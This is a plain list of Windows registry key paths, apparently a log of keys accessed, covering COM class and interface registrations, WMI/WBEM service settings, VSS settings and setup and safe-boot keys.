                HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\TreatAs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\TreatAs

                
                HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\ProgID\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\LocalServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\AppID

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocServer32

                
                HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\LocalServer

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\LocalServer

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\Elevation

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\Tracing\WMI

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit

                
                HKEY_LOCAL_MACHINE\SYSTEM\Setup

                
                HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress

                
                HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Safeboot\Option

                
                HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\VssAccessControl

                
                HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Settings

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout

                
                HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default)

                
                HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag\WMI Writer

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax

                
                HKEY_LOCAL_MACHINE\Software\Classes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TreatAs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\QueryLimit

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PathLimit

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbThrottlingEnabled

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighMaxLimitFactor

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbTaskMaxSleep

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1Mult

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2Mult

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3Mult

                
                HKEY_LOCAL_MACHINE\system\Setup

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Unchecked Task Count

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Directory

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Build

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\MOF Self-Install Directory

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Default Repository Driver

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueCoreFsrepVersion

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Cache Spill Ratio

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckPointValue

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SnapShotValue

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckRepositoryOnNextStartup

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NumWriteIdCheck

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Size

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Item Age (ms)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NextAutoRecoverFile

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Enable Provider Subsystem

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{02A101D1-60F1-43ED-A149-96E77B861279}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{02A101D1-60F1-43ED-A149-96E77B861279}\CreationTime

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{02A101D1-60F1-43ED-A149-96E77B861279}\Provider

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{02A101D1-60F1-43ED-A149-96E77B861279}\Scope

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{02A101D1-60F1-43ED-A149-96E77B861279}\Locale

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{02A101D1-60F1-43ED-A149-96E77B861279}\User

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{02A101D1-60F1-43ED-A149-96E77B861279}\MarshaledProxy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{02A101D1-60F1-43ED-A149-96E77B861279}\ProcessIdentifier

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{53200D82-812C-4C42-A5E0-74CB803F176A}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{53200D82-812C-4C42-A5E0-74CB803F176A}\CreationTime

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{53200D82-812C-4C42-A5E0-74CB803F176A}\Provider

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{53200D82-812C-4C42-A5E0-74CB803F176A}\Scope

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{53200D82-812C-4C42-A5E0-74CB803F176A}\Locale

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{53200D82-812C-4C42-A5E0-74CB803F176A}\User

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{53200D82-812C-4C42-A5E0-74CB803F176A}\MarshaledProxy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{53200D82-812C-4C42-A5E0-74CB803F176A}\ProcessIdentifier

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{603BE053-620B-4345-A123-3BA8128C5CDC}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{603BE053-620B-4345-A123-3BA8128C5CDC}\CreationTime

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{603BE053-620B-4345-A123-3BA8128C5CDC}\Provider

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{603BE053-620B-4345-A123-3BA8128C5CDC}\Scope

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{603BE053-620B-4345-A123-3BA8128C5CDC}\Locale

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{603BE053-620B-4345-A123-3BA8128C5CDC}\User

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{603BE053-620B-4345-A123-3BA8128C5CDC}\MarshaledProxy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{603BE053-620B-4345-A123-3BA8128C5CDC}\ProcessIdentifier

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{C78C9EA0-13FF-4648-B20C-28E21D5ED90B}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{C78C9EA0-13FF-4648-B20C-28E21D5ED90B}\CreationTime

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{C78C9EA0-13FF-4648-B20C-28E21D5ED90B}\Provider

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{C78C9EA0-13FF-4648-B20C-28E21D5ED90B}\Scope

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{C78C9EA0-13FF-4648-B20C-28E21D5ED90B}\Locale

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{C78C9EA0-13FF-4648-B20C-28E21D5ED90B}\User

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{C78C9EA0-13FF-4648-B20C-28E21D5ED90B}\MarshaledProxy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{C78C9EA0-13FF-4648-B20C-28E21D5ED90B}\ProcessIdentifier

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Server

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\CreationTime

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\ProcessIdentifier

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableEvents

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssToBeInitialized

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Low Threshold On Events (B)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\High Threshold On Events (B)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Wait On Events (ms)

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\ESS

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Merger Query Arbitration Enabled

                
                HKEY_LOCAL_MACHINE\software\microsoft\wbem\cimom

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SetupDate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Async Result Queue Size

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cimv2

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cimv2

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\CIMOM

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerBatchSize

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ClientCallbackTimeout

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerQueueThreshold

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Tasks

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\List of event-active namespaces

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)

                
                HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InProcServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)

                
                HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\LocalServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization

                
                HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId

                
                HKEY_CLASSES_ROOT\CLSID\{734AC5AE-68E1-4fb5-B8DA-1D92F7FC6661}\InProcServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{734AC5AE-68E1-4FB5-B8DA-1D92F7FC6661}\InprocServer32\(Default)

                
                HKEY_CLASSES_ROOT\CLSID\{734AC5AE-68E1-4fb5-B8DA-1D92F7FC6661}\LocalServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{734AC5AE-68E1-4FB5-B8DA-1D92F7FC6661}\InprocServer32\ThreadingModel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{734AC5AE-68E1-4FB5-B8DA-1D92F7FC6661}\InprocServer32\Synchronization

                
                HKEY_CLASSES_ROOT\CLSID\{734AC5AE-68E1-4fb5-B8DA-1D92F7FC6661}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{734AC5AE-68E1-4FB5-B8DA-1D92F7FC6661}\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{734AC5AE-68E1-4FB5-B8DA-1D92F7FC6661}\AppId

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders\ROOT\CIMV2:__Win32Provider.Name="WMIPingProvider"

                
                HKEY_LOCAL_MACHINE\system\currentcontrolset\control\minint

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2\SCM Event Provider

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32\(Default)

                
